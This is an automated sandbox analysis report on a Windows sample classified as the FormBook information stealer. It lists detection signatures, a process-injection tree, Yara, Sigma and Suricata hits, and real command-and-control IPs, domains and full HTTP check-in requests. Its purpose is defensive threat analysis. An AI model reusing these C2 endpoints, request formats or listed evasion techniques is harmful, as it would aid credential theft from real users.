Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
9MZZG92yMO.exe

Overview

General Information

Sample name:9MZZG92yMO.exe
renamed because original name is a hash value
Original sample name:c3435c7d8eb6822ff755dd1f48266e8bc267a8d8b87fee7a4ebe8ec8efdd1c30.exe
Analysis ID:1588022
MD5:7f427f12cd43c97f6647a6a39735eba8
SHA1:b6e68860ffd9fddf9e3248b0d89365eab8e4310c
SHA256:c3435c7d8eb6822ff755dd1f48266e8bc267a8d8b87fee7a4ebe8ec8efdd1c30
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 9MZZG92yMO.exe (PID: 4200 cmdline: "C:\Users\user\Desktop\9MZZG92yMO.exe" MD5: 7F427F12CD43C97F6647A6A39735EBA8)
    • svchost.exe (PID: 3568 cmdline: "C:\Users\user\Desktop\9MZZG92yMO.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • XBOIFKGKIWT.exe (PID: 5156 cmdline: "C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RmClient.exe (PID: 7148 cmdline: "C:\Windows\SysWOW64\RmClient.exe" MD5: CE765DCC7CDFDC1BFD94CCB772C75E41)
          • XBOIFKGKIWT.exe (PID: 2196 cmdline: "C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6528 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.4010406938.00000000026B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.4010091145.00000000001B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2453321754.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.4010291438.0000000002650000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000005.00000002.4011798777.0000000002E90000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\9MZZG92yMO.exe", CommandLine: "C:\Users\user\Desktop\9MZZG92yMO.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\9MZZG92yMO.exe", ParentImage: C:\Users\user\Desktop\9MZZG92yMO.exe, ParentProcessId: 4200, ParentProcessName: 9MZZG92yMO.exe, ProcessCommandLine: "C:\Users\user\Desktop\9MZZG92yMO.exe", ProcessId: 3568, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\9MZZG92yMO.exe", CommandLine: "C:\Users\user\Desktop\9MZZG92yMO.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\9MZZG92yMO.exe", ParentImage: C:\Users\user\Desktop\9MZZG92yMO.exe, ParentProcessId: 4200, ParentProcessName: 9MZZG92yMO.exe, ProcessCommandLine: "C:\Users\user\Desktop\9MZZG92yMO.exe", ProcessId: 3568, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T20:48:55.028761+010020507451Malware Command and Control Activity Detected192.168.2.649985134.122.133.8080TCP
                2025-01-10T20:49:18.456390+010020507451Malware Command and Control Activity Detected192.168.2.649990209.74.79.4180TCP
                2025-01-10T20:49:31.809809+010020507451Malware Command and Control Activity Detected192.168.2.649995104.21.112.180TCP
                2025-01-10T20:49:46.967443+010020507451Malware Command and Control Activity Detected192.168.2.649999112.175.247.17980TCP
                2025-01-10T20:50:00.378766+010020507451Malware Command and Control Activity Detected192.168.2.650004194.9.94.8680TCP
                2025-01-10T20:50:13.690180+010020507451Malware Command and Control Activity Detected192.168.2.650008194.245.148.18980TCP
                2025-01-10T20:50:36.650582+010020507451Malware Command and Control Activity Detected192.168.2.650012208.91.197.2780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T20:48:55.028761+010028554651A Network Trojan was detected192.168.2.649985134.122.133.8080TCP
                2025-01-10T20:49:18.456390+010028554651A Network Trojan was detected192.168.2.649990209.74.79.4180TCP
                2025-01-10T20:49:31.809809+010028554651A Network Trojan was detected192.168.2.649995104.21.112.180TCP
                2025-01-10T20:49:46.967443+010028554651A Network Trojan was detected192.168.2.649999112.175.247.17980TCP
                2025-01-10T20:50:00.378766+010028554651A Network Trojan was detected192.168.2.650004194.9.94.8680TCP
                2025-01-10T20:50:13.690180+010028554651A Network Trojan was detected192.168.2.650008194.245.148.18980TCP
                2025-01-10T20:50:36.650582+010028554651A Network Trojan was detected192.168.2.650012208.91.197.2780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T20:49:10.711109+010028554641A Network Trojan was detected192.168.2.649987209.74.79.4180TCP
                2025-01-10T20:49:13.275378+010028554641A Network Trojan was detected192.168.2.649988209.74.79.4180TCP
                2025-01-10T20:49:15.854514+010028554641A Network Trojan was detected192.168.2.649989209.74.79.4180TCP
                2025-01-10T20:49:24.122067+010028554641A Network Trojan was detected192.168.2.649991104.21.112.180TCP
                2025-01-10T20:49:26.676734+010028554641A Network Trojan was detected192.168.2.649993104.21.112.180TCP
                2025-01-10T20:49:29.242866+010028554641A Network Trojan was detected192.168.2.649994104.21.112.180TCP
                2025-01-10T20:49:39.360380+010028554641A Network Trojan was detected192.168.2.649996112.175.247.17980TCP
                2025-01-10T20:49:41.906132+010028554641A Network Trojan was detected192.168.2.649997112.175.247.17980TCP
                2025-01-10T20:49:44.683696+010028554641A Network Trojan was detected192.168.2.649998112.175.247.17980TCP
                2025-01-10T20:49:52.737586+010028554641A Network Trojan was detected192.168.2.650000194.9.94.8680TCP
                2025-01-10T20:49:55.363011+010028554641A Network Trojan was detected192.168.2.650001194.9.94.8680TCP
                2025-01-10T20:49:57.836126+010028554641A Network Trojan was detected192.168.2.650002194.9.94.8680TCP
                2025-01-10T20:50:06.042071+010028554641A Network Trojan was detected192.168.2.650005194.245.148.18980TCP
                2025-01-10T20:50:08.595629+010028554641A Network Trojan was detected192.168.2.650006194.245.148.18980TCP
                2025-01-10T20:50:11.158931+010028554641A Network Trojan was detected192.168.2.650007194.245.148.18980TCP
                2025-01-10T20:50:28.269010+010028554641A Network Trojan was detected192.168.2.650009208.91.197.2780TCP
                2025-01-10T20:50:30.843005+010028554641A Network Trojan was detected192.168.2.650010208.91.197.2780TCP
                2025-01-10T20:50:33.461842+010028554641A Network Trojan was detected192.168.2.650011208.91.197.2780TCP
                2025-01-10T20:50:58.721485+010028554641A Network Trojan was detected192.168.2.65001376.223.67.18980TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: 9MZZG92yMO.exeVirustotal: Detection: 54%Perma Link
                Source: 9MZZG92yMO.exeReversingLabs: Detection: 65%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.4010406938.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4010091145.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2453321754.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4010291438.0000000002650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4011798777.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4014572631.0000000004C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2454199303.0000000003720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2454931273.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: 9MZZG92yMO.exeJoe Sandbox ML: detected
                Source: 9MZZG92yMO.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: RmClient.pdbGCTL source: svchost.exe, 00000002.00000002.2453504721.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2453522622.0000000003212000.00000004.00000020.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000005.00000002.4010832786.0000000000768000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XBOIFKGKIWT.exe, 00000005.00000002.4011137897.0000000000EFE000.00000002.00000001.01000000.00000005.sdmp, XBOIFKGKIWT.exe, 00000008.00000000.2522823189.0000000000EFE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: 9MZZG92yMO.exe, 00000000.00000003.2175316459.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 9MZZG92yMO.exe, 00000000.00000003.2173408119.00000000038E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358220983.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2454227225.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2454227225.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356378337.0000000003400000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4011500190.0000000002E2E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.2452824167.0000000002936000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.2457466949.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4011500190.0000000002C90000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 9MZZG92yMO.exe, 00000000.00000003.2175316459.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 9MZZG92yMO.exe, 00000000.00000003.2173408119.00000000038E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2358220983.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2454227225.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2454227225.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356378337.0000000003400000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, RmClient.exe, 00000006.00000002.4011500190.0000000002E2E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.2452824167.0000000002936000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000003.2457466949.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4011500190.0000000002C90000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: RmClient.exe, 00000006.00000002.4012231174.00000000032BC000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4010464904.000000000276D000.00000004.00000020.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000000.2523020110.00000000027FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2902094064.000000003A76C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: RmClient.exe, 00000006.00000002.4012231174.00000000032BC000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4010464904.000000000276D000.00000004.00000020.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000000.2523020110.00000000027FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2902094064.000000003A76C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: RmClient.pdb source: svchost.exe, 00000002.00000002.2453504721.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2453522622.0000000003212000.00000004.00000020.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000005.00000002.4010832786.0000000000768000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_0052445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0052445A
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_0052C6D1 FindFirstFileW,FindClose,0_2_0052C6D1
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_0052C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0052C75C
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_0052EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0052EF95
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_0052F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0052F0F2
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_0052F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0052F3F3
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_005237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_005237EF
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_00523B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00523B12
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_0052BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0052BCBC
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001CC0D0 FindFirstFileW,FindNextFileW,FindClose,6_2_001CC0D0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 4x nop then xor eax, eax6_2_001B9EA0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 4x nop then mov ebx, 00000004h6_2_02A304EE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49995 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49997 -> 112.175.247.179:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49995 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49996 -> 112.175.247.179:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49988 -> 209.74.79.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50011 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50009 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49993 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50000 -> 194.9.94.86:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49990 -> 209.74.79.41:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49990 -> 209.74.79.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49991 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50008 -> 194.245.148.189:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50008 -> 194.245.148.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50010 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50004 -> 194.9.94.86:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50004 -> 194.9.94.86:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49999 -> 112.175.247.179:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49999 -> 112.175.247.179:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50006 -> 194.245.148.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49987 -> 209.74.79.41:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49985 -> 134.122.133.80:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49985 -> 134.122.133.80:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50002 -> 194.9.94.86:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49998 -> 112.175.247.179:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50001 -> 194.9.94.86:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49994 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50007 -> 194.245.148.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50013 -> 76.223.67.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49989 -> 209.74.79.41:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50012 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50012 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50005 -> 194.245.148.189:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.winningpath.xyz
                Source: DNS query: www.apptj7.xyz
                Source: Joe Sandbox ViewIP Address: 194.9.94.86 194.9.94.86
                Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                Source: Joe Sandbox ViewASN Name: LOOPIASE LOOPIASE
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: Joe Sandbox ViewASN Name: CSLDE CSLDE
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_005322EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_005322EE
                Source: global trafficHTTP traffic detected: GET /ah2l/?nzs0T2=0XIysXmjicdWgm2GWI+Thi8VIPF50KgCrB9qe1pxW9F6KmTtpKViQSnjO8JFZFRtQOT2SKyqDZIyiHstHNrbonPRFLzX8YNbLN93hXWxhTtjpF1XokGMpx8sFq4HkBm76WFwIOg=&mLFl=BXYPt2lXBpi8Dj HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.jrcov55qgcxp5fwa.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /4p8s/?mLFl=BXYPt2lXBpi8Dj&nzs0T2=sbo6CbF7xq9vaRi3YzuXiH7G7PCaul9K2GcB+IL1+35GAWVPgulqGeXZ6bn3jQiNs+qV6ADqYtqo2KT+0SDqdopb2qyXeoTz6pIh8vt4eZWlyhEkc4Yu1dj816xA9fmF7Yf8BYw= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.winningpath.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /qzi3/?nzs0T2=ZstwWiqc2nBlehIthXm/ZN/AUPsgXrD51lhdEOCLGCvwhgyybv3tjhbgBMsRsRSNQM92qNeXuPeIY/BunbCcNNF518/3bUb+8prHuu4wGUKr0baD/E+zEK5A15FFaZBXoYSAzP4=&mLFl=BXYPt2lXBpi8Dj HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.buyspeechst.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /44mq/?nzs0T2=foyEanxfLfFujag6PZWyCDygORHT/b7ZEbPS/LApOdHxGUo+oiUz5nR/Y3bTUTystoAVEPBhAuIJq0FzLvmkL65YpPHBdFMnQ+RN4nJ4f0YiJMRNqIhlsXwKcwXCFylpIZyPQ/A=&mLFl=BXYPt2lXBpi8Dj HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dodowo.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
